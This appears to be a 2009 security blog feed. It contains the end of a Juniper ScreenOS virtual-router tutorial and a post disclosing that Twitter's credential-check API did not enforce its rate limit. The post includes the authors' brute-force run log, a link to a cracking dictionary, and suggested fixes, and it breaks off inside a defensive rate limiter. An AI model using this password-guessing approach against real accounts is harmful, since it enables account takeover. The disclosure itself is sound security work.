<div class="wp-caption" style="float: right;margin: 5px"><img src="http://praetorianprefect.com/wp-content/uploads/2009/05/ssg-5-shjpg.jpeg" border="0" alt="SSG-5-SH.jpg.jpeg" width="300" height="60" /></div>

<p>The Juniper ScreenOS version used here, 6.2.0r2.0, is very new and has been working very well for me in testing.</p>

<p>There are also a few more limitations on the ScreenOS platform that I need to make note of.  The SSG5 I am using has a limit of only 3 routing instances and some other limits that you should verify yourself before starting.  Using the command <code>get license-key</code> will show all the limits for the hardware.  The key things to look for are: <em>Vrouters</em>, <em>Zones</em>, and <em>VLANs</em>.</p>

<pre><code>screenos-1-&gt; get license-key 
extended_key        : XXXXXXXXXXXXX+XXXXXXXXXXXXXXXXXXXXXXX+XXXXXXXXXXXX
                      XXXXXXXXXXXXXXXXXXX/
                      XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
                      XXXXXXXXXXXXXXXXXXXXXXXX/
                      XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX+XXXXXXXXXXXX/
                      XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX+XXXXXXXXXXXXXXXX
                      /XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX++XXXXXXXXXXXXXX/
                      XXXXXXXXXXXXXX+XXXXXX+XXXXXXXXXXXXXXXXXXXXXXXXXXXX
                      ==

Sessions:           16064 sessions
Capacity:           unlimited number of users
NSRP:               ActiveActive
VPN tunnels:        40 tunnels
Vsys:               None
Vrouters:           4 virtual routers
Zones:              10 zones
VLANs:              50 vlans
Drp:                Enable
Deep Inspection:    Enable
Deep Inspection Database Expire Date: Disable
Signature pack:     Signature update key is missing
IDP:                Disable
AV:                 Disable(0)
Anti-Spam:          Disable(0)
Url Filtering:      Disable

Update server url: nextwave.netscreen.com/key_retrieval
License key auto update : Disabled
Auto update interval : 0 days
</code></pre>

<p>Unlike IOS and JunOS, ScreenOS does not have the concept of a global routing instance.  Every interface must belong to a routing instance, and an interface cannot have any addresses assigned when you move it to a different instance.  Because of this, you really should work in a different order and create the routing instances first.</p>

<p>By default, ScreenOS puts all interfaces into the <code>trust-vr</code> routing instance, so let&#8217;s start by checking what is already set up.</p>

<pre><code>screenos-1-&gt; get vrouter
* indicates default vrouter 
A - AutoExport, R - RIP, N- NHRP, O - OSPF, B - BGP, P - PIM

   ID Name                     Vsys                 Owner     Routes    MRoutes     Flags
    1 untrust-vr               Root                 shared      0/max       0/max       
*   2 trust-vr                 Root                 shared      4/max       0/max       

total 2 vrouters shown and 0 of them defined by user
</code></pre>

<p>As you can see there are already 2 routing instances set up.  Let&#8217;s take a look at the interfaces that belong to each.  To do this we need to see what zones are mapped to which routing instances.</p>

<pre><code>screenos-1-&gt; get zone  
Total 14 zones created in vsys Root - 8 are policy configurable.
Total policy configurable zones for Root is 8.
;------------------------------------------------------------------------
  ID Name                             Type    Attr    VR          Default-IF   VSYS      
   0 Null                             Null    Shared untrust-vr   wireless0/3  Root                
   1 Untrust                          Sec(L3) Shared trust-vr     ethernet0/0  Root                
   2 Trust                            Sec(L3)        trust-vr     bgroup0      Root                
   3 DMZ                              Sec(L3)        trust-vr     ethernet0/1  Root                
   4 Self                             Func           trust-vr     self         Root                
   5 MGT                              Func           trust-vr     null         Root                
   6 HA                               Func           trust-vr     null         Root                
  10 Global                           Sec(L3)        trust-vr     null         Root                
  11 V1-Untrust                       Sec(L2) Shared trust-vr     v1-untrust   Root                
  12 V1-Trust                         Sec(L2) Shared trust-vr     v1-trust     Root                
  13 V1-DMZ                           Sec(L2) Shared trust-vr     v1-dmz       Root                
  14 VLAN                             Func    Shared trust-vr     vlan1        Root                
  15 V1-Null                          Sec(L2) Shared trust-vr     l2v          Root                
  16 Untrust-Tun                      Tun            trust-vr     hidden.1     Root                
;------------------------------------------------------------------------
</code></pre>

<p>Now we need to see which interfaces are mapped to which zones.  (Yes, it may seem a little convoluted, but it does make sense for a firewall platform.)</p>

<pre><code>screenos-1-&gt; get interface 

A - Active, I - Inactive, U - Up, D - Down, R - Ready 

Interfaces in vsys Root: 
Name           IP Address                        Zone        MAC            VLAN State VSD      
serial0/0      0.0.0.0/0                         Null        N/A               -   D   -  
eth0/0         0.0.0.0/0                         Untrust     0017.cb80.9f40    -   U   -  
eth0/1         0.0.0.0/0                         DMZ         0017.cb80.9f45    -   D   -  
wireless0/0    192.168.2.1/24                    Trust       0017.cb80.9f55    -   D   -  
wireless0/1    0.0.0.0/0                         Null        0017.cb80.9f56    -   D   -  
wireless0/2    0.0.0.0/0                         Null        0017.cb80.9f57    -   D   -  
wireless0/3    0.0.0.0/0                         Null        0017.cb80.9f58    -   D   -  
bgroup0        192.168.1.1/24                    Trust       0017.cb80.9f4b    -   U   -  
  eth0/2       N/A                               N/A         N/A               -   U   -
  eth0/3       N/A                               N/A         N/A               -   D   -
  eth0/4       N/A                               N/A         N/A               -   D   -
  eth0/5       N/A                               N/A         N/A               -   D   -
  eth0/6       N/A                               N/A         N/A               -   D   -
bgroup1        0.0.0.0/0                         Null        0017.cb80.9f4c    -   D   -  
bgroup2        0.0.0.0/0                         Null        0017.cb80.9f4d    -   D   -  
bgroup3        0.0.0.0/0                         Null        0017.cb80.9f4e    -   D   -  
vlan1          0.0.0.0/0                         VLAN        0017.cb80.9f4f    1   D   -  
null           0.0.0.0/0                         Null        N/A               -   U   0  
</code></pre>

<p>We now have all the information we need to begin the process.  Here is a simplified table to make moving forward a little easier:</p>

<h5>Current</h5>

<table>
<thead>
<tr>
  <th>Interface</th>
  <th>Zone</th>
  <th>Routing Instance</th>
</tr>
</thead>
<tbody>
<tr>
  <td>serial0/0</td>
  <td>Null</td>
  <td>trust-vr</td>
</tr>
<tr>
  <td>eth0/0</td>
  <td>Untrust</td>
  <td>trust-vr</td>
</tr>
<tr>
  <td>eth0/1</td>
  <td>DMZ</td>
  <td>trust-vr</td>
</tr>
<tr>
  <td>wireless0/0</td>
  <td>Trust</td>
  <td>trust-vr</td>
</tr>
</tbody>
</table>

<p>Now let&#8217;s start by creating the one routing instance that is not already set up by default.</p>

<pre><code>screenos-1-&gt; set vrouter name dmz-vr
</code></pre>

<p>Now let&#8217;s see how this shows up on the device.</p>

<pre><code>screenos-1-&gt; get vrouter
* indicates default vrouter 
A - AutoExport, R - RIP, N- NHRP, O - OSPF, B - BGP, P - PIM

   ID Name                     Vsys                 Owner     Routes    MRoutes     Flags
    1 untrust-vr               Root                 shared      0/max       0/max       
*   2 trust-vr                 Root                 shared      4/max       0/max       
 1025 dmz-vr                   Root                 user        0/max       0/max       

total 3 vrouters shown and 1 of them defined by user
</code></pre>

<p>Because a zone cannot be moved between routing instances while interfaces still belong to it, we need to move things around first.  Let&#8217;s start by moving the interfaces that are in the <em>Untrust</em> and <em>DMZ</em> zones to a holder zone named <em>Null</em>.</p>

<pre><code>screenos-1-&gt; set interface eth0/0 zone Null
screenos-1-&gt; set interface eth0/1 zone Null
</code></pre>
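<p>The interface / zone / routing-instance table above was built by hand from <code>get zone</code> and <code>get interface</code>, and the move just performed depends on two preconditions stated in this section: a zone can only change vrouter once no interface is left in it, and an interface can only be moved once it carries no address.  Here is an added example (my own code, not from the post or from Juniper) that derives that table from constructed, trimmed copies of the two outputs, lists which interfaces still pin each zone, and models the <code>set interface ... zone</code> and <code>set zone ... vrouter</code> steps with those preconditions enforced, so a planned sequence can be checked before touching the firewall.  The sample text, the <code>Interface</code> class and the function names are assumptions of this example; the address check is a simplified model of the constraint the section states, not ScreenOS's exact error behaviour.</p>

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

# Constructed samples (not captures from the author's SSG5), trimmed to the
# rows that matter; zone, vrouter and interface names follow the post's lab.
SAMPLE_GET_ZONE = """\
  ID Name                             Type    Attr    VR          Default-IF   VSYS
   0 Null                             Null    Shared untrust-vr   wireless0/3  Root
   1 Untrust                          Sec(L3) Shared trust-vr     ethernet0/0  Root
   2 Trust                            Sec(L3)        trust-vr     bgroup0      Root
   3 DMZ                              Sec(L3)        trust-vr     ethernet0/1  Root
  14 VLAN                             Func    Shared trust-vr     vlan1        Root
"""

SAMPLE_GET_INTERFACE = """\
Name           IP Address                        Zone        MAC            VLAN State VSD
serial0/0      0.0.0.0/0                         Null        N/A               -   D   -
eth0/0         0.0.0.0/0                         Untrust     0017.cb80.9f40    -   U   -
eth0/1         0.0.0.0/0                         DMZ         0017.cb80.9f45    -   D   -
wireless0/0    192.168.2.1/24                    Trust       0017.cb80.9f55    -   D   -
bgroup0        192.168.1.1/24                    Trust       0017.cb80.9f4b    -   U   -
  eth0/2       N/A                               N/A         N/A               -   U   -
vlan1          0.0.0.0/0                         VLAN        0017.cb80.9f4f    1   D   -
"""

UNNUMBERED = "0.0.0.0/0"  # how 'get interface' shows an interface with no address


class Interface(NamedTuple):
    name: str
    ip: str
    zone: str


def parse_get_zone(text: str) -> Dict[str, str]:
    """zone name -> vrouter.  The Attr column is optional, so find the VR by its suffix."""
    zones: Dict[str, str] = {}
    for line in text.splitlines():
        t = line.split()
        if len(t) >= 5 and t[0].isdigit():
            vr = next((x for x in t if x.endswith("-vr")), None)
            if vr:
                zones[t[1]] = vr
    return zones


def parse_get_interface(text: str) -> Dict[str, Interface]:
    """interface name -> Interface.  Bgroup member rows (IP 'N/A') carry no zone and are skipped."""
    ifaces: Dict[str, Interface] = {}
    for line in text.splitlines():
        t = line.split()
        if len(t) == 7 and t[1][:1].isdigit():
            ifaces[t[0]] = Interface(t[0], t[1], t[2])
    return ifaces


def interface_table(zones: Dict[str, str], ifaces: Dict[str, Interface]) -> List[Tuple[str, str, str]]:
    """The interface / zone / routing-instance table, derived instead of hand-built."""
    return [(i.name, i.zone, zones[i.zone]) for i in ifaces.values() if i.zone in zones]


def zone_members(ifaces: Dict[str, Interface]) -> Dict[str, List[str]]:
    """zone -> interfaces still attached; a zone with members cannot change vrouter."""
    members = defaultdict(list)
    for i in ifaces.values():
        members[i.zone].append(i.name)
    return dict(members)


def move_interface(ifaces: Dict[str, Interface], name: str, zone: str) -> Dict[str, Interface]:
    """Model 'set interface <name> zone <zone>'; refused while the interface has an address."""
    iface = ifaces[name]
    if iface.ip != UNNUMBERED:
        raise ValueError(f"{name} still has {iface.ip}; unset it before changing zone")
    new = dict(ifaces)
    new[name] = iface._replace(zone=zone)
    return new


def move_zone(zones: Dict[str, str], ifaces: Dict[str, Interface], zone: str, vr: str) -> Dict[str, str]:
    """Model 'set zone <zone> vrouter <vr>'; refused while any interface is still in the zone."""
    pinned = zone_members(ifaces).get(zone)
    if pinned:
        raise ValueError(f"zone {zone} still has interfaces {pinned}")
    new = dict(zones)
    new[zone] = vr
    return new
```

<p>Replaying the section's sequence against the sample data, <code>move_zone</code> on <em>DMZ</em> is refused while <code>eth0/1</code> is still in it, succeeds once <code>eth0/0</code> and <code>eth0/1</code> have been parked in <em>Null</em>, and <code>move_interface</code> refuses to move <code>wireless0/0</code> because it still carries <code>192.168.2.1/24</code>.</p>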

<p>Now we need to move the zones to the correct routing instances, and while we&#8217;re at it let&#8217;s move the interfaces back and create new sub-interfaces.</p>

<pre><code>screenos-1-&gt; set zone Untrust vrouter untrust-vr
screenos-1-&gt; set zone DMZ vrouter dmz-vr
screenos-1-&gt; set interface eth0/0 zone Untrust
screenos-1-&gt; set interface eth0/1 zone DMZ
screenos-1-&gt; set interface eth0/0.1 tag 100 zone Untrust
screenos-1-&gt; set interface eth0/0.2 tag 200 zone Trust
screenos-1-&gt; set interface eth0/0.3 tag 300 zone DMZ
screenos-1-&gt; set interface eth0/0.4 tag 400 zone Trust

</code></pre>

<p>Finally, let&#8217;s set up the interface addresses.</p>

<pre><code>screenos-1-&gt; set interface eth0/0.1 ip 10.10.10.1/24
screenos-1-&gt; set interface eth0/0.2 ip 172.16.10.1/24
screenos-1-&gt; set interface eth0/0.3 ip 10.10.10.1/24
screenos-1-&gt; set interface eth0/0.4 ip 192.168.10.1/24
</code></pre>

<p>Now we should take a look and see that everything has come out the way we expected.  First, the interfaces:</p>

<pre><code>screenos-1-&gt; get interface 

A - Active, I - Inactive, U - Up, D - Down, R - Ready 

Interfaces in vsys Root: 
Name           IP Address                        Zone        MAC            VLAN State VSD      
serial0/0      0.0.0.0/0                         Null        N/A               -   D   -  
eth0/0         0.0.0.0/0                         Untrust     0017.cb80.9f40    -   U   -  
eth0/0.1       0.0.0.0/0                         Untrust     0017.cb80.9f40  100   U   -  
eth0/0.2       0.0.0.0/0                         Trust       0017.cb80.9f40  200   U   -  
eth0/0.3       0.0.0.0/0                         DMZ         0017.cb80.9f40  300   U   -  
eth0/0.4       0.0.0.0/0                         Trust       0017.cb80.9f40  400   U   -  
eth0/1         0.0.0.0/0                         DMZ         0017.cb80.9f45    -   D   -  
wireless0/0    192.168.2.1/24                    Trust       0017.cb80.9f55    -   D   -  
wireless0/1    0.0.0.0/0                         Null        0017.cb80.9f56    -   D   -  
wireless0/2    0.0.0.0/0                         Null        0017.cb80.9f57    -   D   -  
wireless0/3    0.0.0.0/0                         Null        0017.cb80.9f58    -   D   -  
bgroup0        192.168.1.1/24                    Trust       0017.cb80.9f4b    -   U   -  
  eth0/2       N/A                               N/A         N/A               -   U   -
  eth0/3       N/A                               N/A         N/A               -   D   -
  eth0/4       N/A                               N/A         N/A               -   D   -
  eth0/5       N/A                               N/A         N/A               -   D   -
  eth0/6       N/A                               N/A         N/A               -   D   -
bgroup1        0.0.0.0/0                         Null        0017.cb80.9f4c    -   D   -  
bgroup2        0.0.0.0/0                         Null        0017.cb80.9f4d    -   D   -  
bgroup3        0.0.0.0/0                         Null        0017.cb80.9f4e    -   D   -  
vlan1          0.0.0.0/0                         VLAN        0017.cb80.9f4f    1   D   -  
null           0.0.0.0/0                         Null        N/A               -   U   0  
</code></pre>

<p>Now the routing instances:</p>

<pre><code>screenos-1-&gt; get route
H: Host C: Connected S: Static A: Auto-Exported
I: Imported R: RIP P: Permanent D: Auto-Discovered
N: NHRP
iB: IBGP eB: EBGP O: OSPF E1: OSPF external type 1
E2: OSPF external type 2 trailing B: backup route


IPv4 Dest-Routes for &lt;untrust-vr&gt; (2 entries)
;--------------------------------------------------------------------------------------
         ID          IP-Prefix      Interface         Gateway   P Pref    Mtr     Vsys
;--------------------------------------------------------------------------------------
*         2      10.10.10.1/32       eth0/0.1         0.0.0.0   H    0      0     Root
*         1      10.10.10.0/24       eth0/0.1         0.0.0.0   C    0      0     Root



IPv4 Dest-Routes for &lt;trust-vr&gt; (8 entries)
;--------------------------------------------------------------------------------------
         ID          IP-Prefix      Interface         Gateway   P Pref    Mtr     Vsys
;--------------------------------------------------------------------------------------
*         5     172.16.10.0/24       eth0/0.2         0.0.0.0   C    0      0     Root
*         8    192.168.10.1/32       eth0/0.4         0.0.0.0   H    0      0     Root
*         4     192.168.1.1/32        bgroup0         0.0.0.0   H    0      0     Root
          2     192.168.2.1/32    wireless0/0         0.0.0.0   H    0      0     Root
          1     192.168.2.0/24    wireless0/0         0.0.0.0   C    0      0     Root
*         3     192.168.1.0/24        bgroup0         0.0.0.0   C    0      0     Root
*         7    192.168.10.0/24       eth0/0.4         0.0.0.0   C    0      0     Root
*         6     172.16.10.1/32       eth0/0.2         0.0.0.0   H    0      0     Root



IPv4 Dest-Routes for &lt;dmz-vr&gt; (2 entries)
;--------------------------------------------------------------------------------------
         ID          IP-Prefix      Interface         Gateway   P Pref    Mtr
;--------------------------------------------------------------------------------------
*         2      10.10.10.1/32       eth0/0.3         0.0.0.0   H    0      0         
*         1      10.10.10.0/24       eth0/0.3         0.0.0.0   C    0      0         


</code></pre>
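<p>As an added check (example code written for this post, not a ScreenOS feature), the following parses a <code>get route</code> listing like the one above and confirms that each connected prefix sits in the virtual router the design intended, and that the duplicated 10.10.10.0/24 overlaps only across routers, never within one. The sample listing is a trimmed, constructed copy of the output above; the <code>DESIGN</code> table and the function names are assumptions made for the example.</p>

```python
import re
from collections import defaultdict

# Constructed sample: a trimmed copy of the "get route" listing from the post.
GET_ROUTE_OUTPUT = """\
IPv4 Dest-Routes for <untrust-vr> (2 entries)
;------------------------------------------------------------------------------
         ID          IP-Prefix      Interface         Gateway   P Pref    Mtr     Vsys
;------------------------------------------------------------------------------
*         2      10.10.10.1/32       eth0/0.1         0.0.0.0   H    0      0     Root
*         1      10.10.10.0/24       eth0/0.1         0.0.0.0   C    0      0     Root

IPv4 Dest-Routes for <trust-vr> (4 entries)
;------------------------------------------------------------------------------
         ID          IP-Prefix      Interface         Gateway   P Pref    Mtr     Vsys
;------------------------------------------------------------------------------
*         5     172.16.10.0/24       eth0/0.2         0.0.0.0   C    0      0     Root
          1     192.168.2.0/24    wireless0/0         0.0.0.0   C    0      0     Root
*         3     192.168.1.0/24        bgroup0         0.0.0.0   C    0      0     Root
*         7    192.168.10.0/24       eth0/0.4         0.0.0.0   C    0      0     Root

IPv4 Dest-Routes for <dmz-vr> (2 entries)
;------------------------------------------------------------------------------
         ID          IP-Prefix      Interface         Gateway   P Pref    Mtr
;------------------------------------------------------------------------------
*         2      10.10.10.1/32       eth0/0.3         0.0.0.0   H    0      0
*         1      10.10.10.0/24       eth0/0.3         0.0.0.0   C    0      0
"""

# The design we intended to build (an assumption for this example): which
# connected prefix should sit on which interface inside each virtual router.
DESIGN = {
    "untrust-vr": {"10.10.10.0/24": "eth0/0.1"},
    "dmz-vr": {"10.10.10.0/24": "eth0/0.3"},
    "trust-vr": {
        "172.16.10.0/24": "eth0/0.2",
        "192.168.10.0/24": "eth0/0.4",
        "192.168.1.0/24": "bgroup0",
        "192.168.2.0/24": "wireless0/0",
    },
}

VR_HEADER = re.compile(r"^IPv4 Dest-Routes for <(?P<vr>[^>]+)>")
# A leading '*' marks the active route; the Vsys column is absent for user VRs.
ROUTE_LINE = re.compile(
    r"^\*?\s+(?P<id>\d+)\s+(?P<prefix>\S+/\d+)\s+(?P<iface>\S+)\s+"
    r"(?P<gateway>\S+)\s+(?P<proto>\w+)\s+\d+\s+\d+"
)


def parse_get_route(text):
    """Returns {vrouter: [(prefix, interface, protocol), ...]}."""
    routes = defaultdict(list)
    current_vr = None
    for line in text.splitlines():
        header = VR_HEADER.match(line)
        if header:
            current_vr = header.group("vr")
            continue
        m = ROUTE_LINE.match(line)
        if m and current_vr is not None:
            routes[current_vr].append((m.group("prefix"), m.group("iface"), m.group("proto")))
    return dict(routes)


def overlapping_prefixes(routes):
    """Prefixes present in more than one vrouter. Overlap across VRs is
    expected here; an address space that is supposed to be isolated
    leaking into a second VR would show up in this map as well."""
    seen = defaultdict(set)
    for vr, entries in routes.items():
        for prefix, _iface, _proto in entries:
            seen[prefix].add(vr)
    return {p: vrs for p, vrs in seen.items() if len(vrs) > 1}


def verify_placement(routes, design):
    """Compares the connected routes on the box with the design and returns
    a list of discrepancies (empty when everything landed where intended)."""
    problems = []
    for vr, wanted in design.items():
        actual = {p: iface for p, iface, proto in routes.get(vr, []) if proto == "C"}
        for prefix, iface in wanted.items():
            if prefix not in actual:
                problems.append(f"{vr}: {prefix} missing")
            elif actual[prefix] != iface:
                problems.append(f"{vr}: {prefix} on {actual[prefix]}, expected {iface}")
        for prefix in sorted(actual.keys() - wanted.keys()):
            problems.append(f"{vr}: unexpected connected prefix {prefix} on {actual[prefix]}")
    return problems
```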

<blockquote>
  <p>Based on the findings of the report, my conclusion was that this idea was not a practical deterrent for reasons which at this moment must be all too obvious.</p>
  
  <p>Dr. Strangelove</p>
</blockquote>

<h2 id="footnotes">Footnotes</h2>

<div class="footnotes">
<hr />
<ol>

<li id="fn:1">
<p>MAN is a Metropolitan Area Network: <a href="http://en.wikipedia.org/wiki/Metropolitan_Area_Network">Wikipedia</a>&#160;<a href="#fnref:1" rev="footnote">&#8617;</a></p>
</li>

<li id="fn:4">
<p>I should take a second and also point out that Cisco has a long and <em>s.l.o.w</em> history of making management services available via a VRF.  In fact, so many features cannot be enabled inside a VRF that most just use the global routing table for management and push all production traffic into VRFs.&#160;<a href="#fnref:4" rev="footnote">&#8617;</a></p>
</li>

<li id="fn:3">
<p>Table of vendor and VRF naming conventions
<table>
<thead>
<tr>
  <th>Vendor</th>
  <th>OS</th>
  <th>VRF-Lite</th>
  <th>VRF</th>
  <th>Notes</th>
</tr>
</thead>
<tbody>
<tr>
  <td>Juniper</td>
  <td>JunOS</td>
  <td>Virtual Router</td>
  <td>VRF</td>
  <td>JunOS has many other ways of performing VRF functions. More details <a href="http://www.juniper.net/techpubs/software/junos/junos85/swconfig85-vpns/frameset.html">here</a></td>
</tr>
<tr>
  <td>Juniper</td>
  <td>ScreenOS</td>
  <td>Virtual Router</td>
  <td><em>N/A</em></td>
  <td></td>
</tr>
<tr>
  <td>Cisco</td>
  <td>IOS</td>
  <td>VRF Lite</td>
  <td>VRF</td>
  <td></td>
</tr>
<tr>
  <td>Cisco</td>
  <td>NX-OS</td>
  <td>VRF Lite</td>
  <td>VRF</td>
  <td></td>
</tr>
<tr>
  <td>Cisco</td>
  <td>ASA</td>
  <td>Contexts</td>
  <td><em>N/A</em></td>
  <td></td>
</tr>
<tr>
  <td>Cisco</td>
  <td>PIXOS</td>
  <td><em>N/A</em></td>
  <td><em>N/A</em></td>
  <td></td>
</tr>
</tbody>
</table>&#160;<a href="#fnref:3" rev="footnote">&#8617;</a></p>
</li>

<li id="fn:2">
<p>Yes, yes. I know I could do everything at once and commit last, and that is one of the reasons I love JunOS, but this is also about building and seeing each change and how it affects the overall router.&#160;<a href="#fnref:2" rev="footnote">&#8617;</a></p>
</li>

</ol>
</div>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/09/vrf-is-the-new-black-how-i-learned-to-stop-worrying-and-love-the-complexity/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Breaking Twitter (authentication)</title>
		<link>http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/</link>
		<comments>http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/#comments</comments>
		<pubDate>Fri, 25 Sep 2009 17:26:54 +0000</pubDate>
		<dc:creator>Jeremy Rossi</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[tweethon]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=530</guid>
		<description><![CDATA[Yesterday we spent some time speculating on how phishing attacks like the one afflicting Twitter on Wednesday of this week are seeded.  How are the original direct messages sent out that kick off the first stolen credentials, the next set of direct messages, and so on in the loop?  We were hoping, but [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday we spent some time speculating on how phishing attacks like the one afflicting Twitter on Wednesday of this week are seeded.  How are the original direct messages sent out that kick off the first stolen credentials, the next set of direct messages, and so on in the loop?  We were hoping, but not counting on, the fact that Twitter might address this in their blog.  Taking a page from Google or Microsoft, an up front and transparent approach to security seems to be the direction of major players in the online space.  Twitter may consider embracing this approach, given its rampant rise in popularity and thus existence at the edge of malicious customized attacks from bad actors, as it likely has a lot of data that would benefit the information assurance community.</p>

<p><a href="http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/">In our rampant speculating</a> (guessing), we noted that we thought brute force password attacks would move away from the main Twitter login page because of their implementation of CAPTCHA (showing an image that is easy for a human to translate and type in but difficult for a computer to identify), which occurs after several failed login attempts.  While some success has been reported by both researchers attempting to break CAPTCHA, as well as researchers <a href="http://securitylabs.websense.com/content/Blogs/2919.aspx">watching others break it</a>, the processing time of dealing with translating thousands of CAPTCHA messages becomes problematic from a password cracking standpoint (as far as we know, if you have a counter example please show us).  So where does one go to perform the type of brute force password attack that a <a href="http://www.wired.com/threatlevel/2009/01/professed-twitt/">teenage hacker used in January</a> to gain access to <a href="http://twitter.com/crystal">Crystal the Twitter admin&#8217;s</a> account, achieve &#8216;Happiness&#8217; and allow others to tweet on behalf of Barack Obama and Britney Spears?</p>

<div id="attachment_576" class="wp-caption alignnone" style="width: 510px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/obama-twitter-hacked.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/obama-twitter-hacked.jpg" alt="Back in January the @BarackObama account was broken into." title="obama-twitter-hacked" width="500" height="327" class="size-full wp-image-576" /></a><p class="wp-caption-text">Back in January the @BarackObama account was broken into.</p></div>

<p>We thought that the Twitter API (application program interface) is the next place to go.  While moving towards OAuth authentication (a mechanism by which users can provide others access to their data without providing their authentication credentials) the old style API calls with user name and password are still available.  Providing an API is one of the primary reasons for Twitter&#8217;s popularity, as many tools can provide both interfaces into the online services of Twitter, as well as act as aggregators for the data within Twitter&#8217;s data stores.  In fact, for most tweeple, the actual system confines of Twitter might as well be a big database, as they are doing their tweeting through <a href="http://tweetdeck.com/">TweetDeck</a> or <a href="http://www.atebits.com/tweetie-iphone/">Tweetie</a>, monitoring topics at <a href="http://twitterfall.com/">TwitterFall</a>, looking at their favorite famous twits at <a href="http://www.congressional140.com">Congressional140</a> or <a href="http://www.celebritytweet.com/">CelebrityTweet</a>, mapping the world&#8217;s tweets with <a href="http://beta.twittervision.com/">TwitterVision</a>, or evaluating themselves with <a href="http://www.cursebird.com/">CurseBird</a>.</p>

<p>That same API provides an alternate path for logging into Twitter, and provides all the functionality available through the web application (authentication, reading tweets, tweeting).  You can read more about the overall Twitter API here: <a href="http://apiwiki.twitter.com">http://apiwiki.twitter.com</a>.</p>

<p>But wait, you say, are you trying to tell us that brute force password attacks will move to the API when I just read on the Twitter API wiki that the API severely limits the rate of calls you are allowed to make to it (200/hour/IP for authenticated requests without whitelisting)?  That should be a mitigating control.  Should be, but isn&#8217;t, because it is not enforced on all of the API calls.</p>

<h3>Rate Limit? We don&#8217;t need no stinking rate limit.</h3>

<p>From the Twitter API documentation on <a href="http://apiwiki.twitter.com/Twitter-REST-API-Method%3A-account%C2%A0verify_credentials">account/verify_credentials</a>, Twitter states:</p>

<p><em>Returns an HTTP 200 OK response code and a representation of the requesting user if authentication was successful; returns a 401 status code and an error message if not.  Use this method to test if supplied user credentials are valid. Because this method can be a vector for a brute force dictionary attack to determine a user&#8217;s password, it is limited to <em>15 requests per 60 minute period</em> (starting from your first request).</em></p>

<p>Well, let&#8217;s see.  Using a simple Python program that tried known incorrect passwords as fast as the API would respond (but well below DoS thresholds), we have this:</p>

<pre><code>[~]% time python twitterauthcheck.py
Login: _eeeeeeeek Password: 0 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 1 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 2 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 3 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 4 failed: HTTP Error 401: Unauthorized

[......SNIP......]

Login: _eeeeeeeek Password: 295 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 296 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 297 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 298 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: 299 failed: HTTP Error 401: Unauthorized
Login: _eeeeeeeek Password: &lt;redacted&gt; accepted
/opt/local/bin/python2.6 testingauth.py  2.03s user 1.47s system 1% cpu 4:25.05 total
</code></pre>

<p>So looking at the details we have 300 passwords attempted in 2 minutes and 3 seconds.  We can also see on the 300th attempt the password was accepted (we put the correct password in at number 300) so we can conclude that the account is not getting locked out due to enforcement of rate limits. So next we ran the script six times concurrently (3,600 attempts).  Still not locked out.</p>

<p>We are also showing that we are able to blow through the overall 150 request limit per IP per hour that Twitter reports is the rate limit.  Running multiple attempts did start to hit some 503 Bad Gateway errors which we thought might be the end of the road, but no, it started responding again a second later.</p>

<p>Running the script is slow.  Twitter&#8217;s greatest defense here against a true brute force attack using a single thread is that it takes a while for their infrastructure to respond.  We can call that security through lack of capacity.  Since a good password cracker takes more than a few hundred entries to work (<a href="http://praetorianprefect.com/wp-content/uploads/2009/09/dic.txt">this L0phtCrack dictionary has 235,007 entries</a>), we&#8217;ll go multi-threaded.</p>

<p>In a final controlled example, we use a known account where one person sets a simple dictionary-word password and the other person runs the script without specifically knowing the password (just in case someone wants to write a Computer Fraud and Abuse Act essay in the comments: when someone logs into their own account, it&#8217;s called authentication).  Again, a low request threshold, and only accessing our own account.</p>

<p>25,086 attempts thus far before we got bored watching it, so a little over 7 hours and the whole 200,000+ dictionary word list would be done, and likely any account using a common dictionary based password would be accessed.  We tried a few subsequent runs that mixed in a correct password just to ensure everything was working, and the program notified us of the successful login.</p>

<p>If Twitter wants to minimize the probability of success for this vulnerability it could:</p>

<ul>
<li>Enforce its stated rate limits.</li>
<li>Start requiring minimally complex passwords.</li>
<li>Complete the migration to OAuth.</li>
</ul>
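<p>As an added example (not the post&#8217;s script and not Twitter&#8217;s implementation), here is what the first recommendation looks like server-side: a limiter that enforces the policy quoted above, 15 requests per 60-minute window counted from the first request, on every call to the credential-check handler, and that keys the count on the target account as well as the source IP so that the multi-threaded run described above exhausts the account&#8217;s budget too. The class and function names, the clock hook and the credential store are invented for the example.</p>

```python
"""Server-side enforcement of a credential-check rate limit.

Added example for this post; it is not the post's script and not Twitter's
implementation. Names, the clock hook and the credential store are invented."""
import time
from collections import defaultdict

WINDOW_SECONDS = 60 * 60   # the quoted policy: a 60 minute period...
MAX_REQUESTS = 15          # ...allowing 15 requests, counted from the first


class VerifyCredentialsLimiter:
    """Fixed window that starts at the caller's first request.

    Every request is charged against two buckets, the source IP and the
    target account, so spreading attempts over many IPs or threads (the
    post's multi-threaded run) still exhausts the account's budget."""

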